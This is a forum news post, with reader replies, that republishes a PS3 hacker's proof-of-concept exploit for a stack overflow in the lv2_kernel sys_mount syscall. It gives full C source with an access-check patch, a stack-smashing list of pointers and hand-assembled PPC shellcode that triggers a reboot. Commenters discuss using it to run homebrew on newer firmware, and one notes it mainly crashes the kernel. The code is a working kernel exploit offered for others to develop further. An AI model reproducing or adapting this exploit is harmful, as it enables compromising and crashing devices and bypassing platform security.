Naehrwert released PS3 LV2_Kernel Exploit Sample Implementation

[Abkarino]

Today the well known PS3 Developer/Hacker Naehrwert known for his great tools like SCETool and Libeid and also for his reverse engineering work in PS3 System, had made a blog post about Lv2 exploiting, that will work in all current firmwares till the last one from Sony OFW4.25.

To quote from his blog:

A long while ago KaKaRoTo pointed me to a stack overflow he found while reversing lv2_kernel. But there are two problems:

1. The vulnerability is in a protected syscall (the SELF calling it got to have the 0×40… control flags set). So you’d first need to find a suitable usermode exploit (don’t ask us), that gives you code execution with the right privileges.
2. The payload data is copied to lv2 heap first and the function will do a free call on it before the payload has any chance to get executed. This might not sound like a problem but it looks like lv2′s heap implementation will overwrite the free’ed space with 0xABADCAFE and thus destroy the payload.

Here is my sample implementation for 3.41 lv2_kernel (although the vulnerability should be present in all versions of lv2 up to the latest firmware), maybe someone of you will find a way to overcome problem (2.) and can get something nice out of it because right now it’s only good to crash lv2.

And this is his PS3 LV2_Kernel Exploit sample implementation:

Code:

/*
* lv2 sys_mount stack overflow
* Original finder: KaKaRoTo (thank you for pointing it out!)
* Note: all offsets/values/addrs in this source are 3.41 specific
*/

#include <stdio.h>
#include <ppu-types.h>
#include <ppu-lv2.h>

/*
unk2, unk3 is what we're going to use here.
lv2 will handle unk2, unk3 like this:
char *strlist[FIXED_SIZE]; //On stack.
for(i = 0; i < unk3; i++)
	strlist[i] = strdup_from_uspace(*unk2++);
*/
static s64 sys_mount(const char *dev /*r3*/, const char *fs /*r4*/, const char *path /*r5*/, 
	u64 unk0 /*r6*/, u64 wp /*r7*/, u64 unk1 /*r8*/, const char **unk2 /*r9*/, u64 unk3 /*r10*/)
{
	lv2syscall8(837, (u64)dev, (u64)fs, (u64)path, 
		(u64)unk0, (u64)wp, (u64)unk1, (u64)unk2, (u64)unk3);
	return_to_user_prog(s64);
}

//For testing.
static void patch_access_check()
{
	//check_access @ 0x80000000000505D0
	//li r3, 1 ; blr
	lv2syscall2(7, 0x80000000000505D0ULL, 0x386000014E800020ULL);
	printf("[*] DEBUG: access check patched.\n");
}

int main(int argc, const char **argv)
{
	//Problem: The mount syscall needs the 0x40 ctrl flag (root) to be set.
	//Solution: Find a usermode exploit in a SELF that has them set.
	
	//Patch the ctrl flags check for testing.
	patch_access_check();
	
	//Nop.
	char nop[] = "X";
	
	//Payload.
	char payload[] = 
	{
		//Insert valid PPC code here (without 0x00 bytes)
		//and hope lv2 heap 0x27 is executable and 0x04 aligned.
		0x38, 0xE0, 0x7E, 0xF0, //li r7, 0x7EF0
		0x38, 0xE7, 0x01, 0x10, //addi  r7, r7, 0x110
		0x78, 0xE7, 0x83, 0xE4, //sldi  r7, r7, 16
		0x78, 0xE7, 0x07, 0xC6, //sldi  r7, r7, 32
		0x60, 0xE7, 0x91, 0x34, //ori   r7, r7, 0x9134
		0x7C, 0xE9, 0x03, 0xA6, //mtctr r7            ; 0x8000000000009134 (sys_sm_shutdown)
		0x38, 0x60, 0x02, 0x10, //li    r3, 0x210
		0x38, 0x63, 0xFF, 0xF0, //addi  r3, r3, -0x10 ; 0x200 (reboot)
		0x7C, 0x84, 0x22, 0x78, //xor   r4, r4, r4    ; 0
		0x7C, 0xA5, 0x2A, 0x78, //xor   r5, r5, r5    ; 0
		0x7C, 0xC6, 0x32, 0x78, //xor   r6, r6, r6    ; 0
		0x4E, 0x80, 0x04, 0x20, //bctr
		//End of payload.
		0x00
	};
	
	//List containing the entries.
	//stack frame size is 0x1C0
	//strlist = framptr + 0xE0
	//remaining stack frame size is 0xE0 (28 * 8)
	#define LIST_LENGTH (28 + 2 + 1)
	const char *list[LIST_LENGTH] = 
	{
		//-0xE0
		//Overwrite stack with nop entries (0xE0 bytes).
		nop, nop, nop, nop, nop, nop, nop, nop, //0x40
		nop, nop, nop, nop, nop, nop, nop, nop, //0x80
		nop, nop, nop, nop, nop, nop, nop, nop, //0xC0
		nop, nop, nop, nop,
		//0x00
		//Fill 0x10 bytes to reach saved r0.
		nop, nop,
		//+0x10
		//Overwrite saved r0 with a pointer to our payload.
		payload
	};
	
	//Doit!
	printf("[*] Taking the plunge...\n");
	s64 res = sys_mount("FOO", "BAR", "XXX", 0, 0, 0, list, LIST_LENGTH);
	printf("[*] Error: sys_mount returned (res = 0x%016lX).\n", (u64)res);
	
	return 0;
}

Thanks for Naehrwert for posting this info and also thanks for KaKaRoTo for original exploit finding.

NEWS SOURCE: Exploiting LV2 by Naehrwert

[nextbike]

Naehrwert news is always great.
We are lucky he likes ps3

[Abkarino]

Naehrwert news is always great.
We are lucky he likes ps3

Yea sure he know more and more info about PS3, and he still have a lot of secrets that he will not share to us right now

[the-green]

This is a very good start !! hope some one will continue in this road !!! go go go !!
Thanks for this news

[Yuu]

Now this is awesome crunchfilled news i like to read about , :bow: to the devs , keep it up guys.

[Abkarino]

This is a very good start !! hope some one will continue in this road !!! go go go !!
Thanks for this news

You are welcome, I hope that also some one with good knowledge can use it in useful things like Homebrew running in newer firmware, or make a backup solution for it.
Also since its a software exploit and it had been exist in all current firmwares, i think it will allow us after improvement off course to run our own applications in newer firmware/hardware revision like currently non hackable CECH-300X models and upcoming CECH-400X series also.

[Twinaphex]

It's a great way to brick Lv2, I'll give it that.

An exploit? An exploit is something that, you know, is an actual exploit - like the PS2 Independence 'exploit', something like the Phantasy Star Online 'PSOLoad' exploit on Gamecube, something along those lines. Or the 'MechAssault' exploit. Call it more what it is - a 'bricker' that could POTENTIALLY (In a far, far away universe) POSSIBLY lead to an exploit someday.

[Passerotto]

someone explain to me what, this news means for the ps3 scene!

[stock2255]

Twinaphex,

I don't have the near level of reverse engineering or skilling code as many people, including you. I've read through this here "work" numerous times, and I understand the concept. I understand exactly what he is doing, and the ease of porting the offsets to other firmwares. I learned the basic of porting offsets dealing with Everquest updates, and wanting to keep Macroquest up to date without waiting for the developers (hell...I think I was 13 than) That's fairly easy to grasp, and what he is trying to accomplish. I'm very grateful he shared. However, it seems like for an exploit, or any kind of useful tool, this is a small step. For example, if I were writing a book, I developed a REALLY good title for the book, kick-ass title. Best title you've ever seen. But, the entire contents of the book, the story, characters, plot, etc., are up to you to write still. I'm glad I have a kick-ass title (or a proof of concept of a possible lv2 exploit), but I don't have the book written, the important part (or the bulk of the work when it comes to actually creating an exploit)

Am I missing something?

[themuse]

i can haz 4.25 cfw now?